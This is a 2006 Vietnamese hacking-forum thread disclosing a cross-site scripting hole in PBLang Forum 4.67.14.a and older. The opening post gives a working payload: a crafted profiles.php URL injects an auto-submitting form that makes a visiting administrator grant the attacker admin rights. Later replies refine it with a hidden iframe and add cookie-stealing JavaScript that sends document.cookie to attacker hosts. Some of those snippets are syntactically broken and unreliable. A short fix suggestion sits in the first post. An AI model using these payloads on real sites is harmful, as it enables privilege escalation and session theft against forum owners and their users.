PBLang Forum XSS vuln => get admin

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thông tin new bugs và exploits

PBLang Forum XSS vuln => get admin

[Question] PBLang Forum XSS vuln = get admin	14/07/2006 10:00:49 (+0700) \| #1 \| 6544

Quan Vân Trường
HVA Friend

Joined: 19/07/2002 10:13:30
Messages: 115
Location: 9:00PM-6:00AM
Offline

/--------------------------------------
Product: PBLang Forum
Version: 4.67.14.a + older
Vuln: XSS
Rate: khá nguy hiểm
Homepage: http://pblforum.drmartinus.de/ (tested)
Author: Quan Vân Trường
--------------------------------------/

Sơ lượt:
PBLang Forum: viết bằng ngôn ngữ PHP, khá ổn định, đặc biệt: sử dụng file làm DB. Một số "điểm yếu" đã được phát hiện trước đây: XSS, cookie, code injection...
Trong đó, "điểm yếu" chết người nhất là: ko tách ACP ra khỏi main forum => chỉ cần login 1 lần là có thể vào đến ACP. Mặt khác, trong ACP có mục "Grant Status". Ta sẽ sử dụng XSS để submit form "Grant Status" theo ý mình.
XSS dc tìm thấy tại file profile.php

Khai thác:
Chỉ cần admin của forum vào URL này:

hxxp://[path_to_PBLang]/profiles.php?u=
<form name=hack method=post action=http://localhost/PBL/admin2.php?do=grantm2>
<input type=hidden name=user value=[username của bạn]><input type=hidden name=stat value=7></form>
<body onload=document.hack.submit()>

Bạn sẽ trở thành admin. Chú ý, tất cả các tag cùng 1 dòng, em phải xuống dòng cho dễ nhìn...

Khắc phục:
Thực ra PBLang đã fix bug XSS tại mục này, vấn đề phát sinh XSS là do PBLang dùng file để làm DB và để lấy info của 1 user, PBLang phải dùng fopen và include => error có chứa XSS mà ta đã tạo.
Vậy, ta cần vô hiệu hoá các báo lỗi bằng cách thêm "@" vào trước fopen và include, cái này ai đã học qua PHP đều biết, em ko nói thêm.

Thân.

Kernel Panic.

[Question] PBLang Forum XSS vuln = get admin	23/07/2006 02:07:44 (+0700) \| #2 \| 9119

xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline

Chà kì này chắc phải viết lại gần hết code của PBLang quá

iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline

[Question] PBLang Forum XSS vuln = get admin	31/07/2006 21:43:12 (+0700) \| #3 \| 11349

Luke
Elite Member

Joined: 05/09/2002 13:21:20
Messages: 83
Offline

Anh có một ý kiên nữa, là để cho khéo thì nên làm như sau
/profiles.php?u=<iframe src=_blank withd=1 height=1 name=ihack></iframe>
<form name=hack method=post action=http://localhost/PBL/admin2.php?do=grantm2 target=ihack>
<input type=hidden name=user value=[username của bạn]><input type=hidden name=stat value=7></form>
<body onload=document.hack.submit()>

[Question] PBLang Forum XSS vuln = get admin	31/07/2006 21:50:18 (+0700) \| #4 \| 11350

Luke
Elite Member

Joined: 05/09/2002 13:21:20
Messages: 83
Offline

Dùng kỹ thuật này để ăn cắp cookie 1 cách hoàn hảo

Nếu chỉ post đơn thuần javascript, thì có thể tạo tương tự như sau

iObj=document.createElement("iframe");
iObj=setAttribute("name","ihack");
iObj.width=1;
iObj.height=1;
iObj.src='http://hacker'sdomain.com/savecookie='+document.cookie()

[Question] PBLang Forum XSS vuln = get admin	07/08/2006 09:08:38 (+0700) \| #5 \| 12835

Luke
Elite Member

Joined: 05/09/2002 13:21:20
Messages: 83
Offline

Thế này thì còn khéo hơn nữa
onmouseover="LukesObj=document.createElement('img'); LukesObj.style.width=1;LukesObj.style.height=1;LukesObj.src= 'http://hackershost.com/log.php?cookie'=document.cookie; document.body.insertBefore(LukesObj);"

Go to:

Users currently in here
1 Anonymous